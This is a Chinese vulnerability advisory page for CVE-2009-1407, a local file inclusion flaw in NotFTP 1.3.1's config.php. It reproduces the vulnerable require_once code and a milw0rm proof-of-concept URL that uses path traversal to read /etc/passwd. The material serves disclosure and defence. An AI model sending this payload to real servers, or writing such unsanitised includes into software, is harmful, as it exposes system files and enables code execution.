Wonko NotFTP config.php本地文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117632 漏洞类型 路径遍历
发布时间 2009-04-21 更新时间 2009-04-24
CVE编号 CVE-2009-1407 CNNVD-ID CNNVD-200904-476
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/8504
https://cxsecurity.com/issue/WLB-2009040231
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-476
|漏洞详情
NotFTP是用PHP编写的基于Web的HTTP-FTP网关。NotFTP的config.php脚本没有正确地过滤用户所提交的参数,如果远程攻击者在提交的URL请求中使用newlang参数指定了本地系统的恶意文件的话,就可能在Web服务器上读取敏感信息或执行任意代码。以下是config.php脚本中的有漏洞代码段:if(isset($newlang)){require_once("lib/lang/".$languages[$newlang]["file"]);}elseif(isset($_COOKIE["notftplang"])){require_once("lib/lang/".$languages[$_COOKIE["notftplang"]]["file"]);}else{require_once("lib/lang/".$languages[DEFAULTLANG]["file"]);}
|漏洞EXP
NotFTP 1.3.1 => Local file include
http://sourceforge.net/projects/notftp/


Author: Kacper
Email: kacper1964@yahoo.pl
Home: http://devilteam.pl/

DC++ Hub address: bluber-hub.no-ip.biz:2008

Vuln:

File config.php:

#########################################################################
# This is where we decide what language to use. Don't mess with this
# either.
#########################################################################

if (isset($newlang))
{
   require_once("lib/lang/".$languages[$newlang]["file"]);
}
elseif (isset($_COOKIE["notftplang"]))
{
   require_once("lib/lang/".$languages[$_COOKIE["notftplang"]]["file"]);
}
else
{
   require_once("lib/lang/".$languages[DEFAULTLANG]["file"]);
}

# NotFTP version. Changing this would be silly. So don't.

PoC:

http://site.pl/path/config.php?newlang=kacper&languages[kacper][file]=../../../../../etc/passwd

The End

========= 

# milw0rm.com [2009-04-21]
|参考资料

来源:XF
名称:notftp-config-file-include(49988)
链接:http://xforce.iss.net/xforce/xfdb/49988
来源:BID
名称:34636
链接:http://www.securityfocus.com/bid/34636
来源:MILW0RM
名称:8504
链接:http://www.milw0rm.com/exploits/8504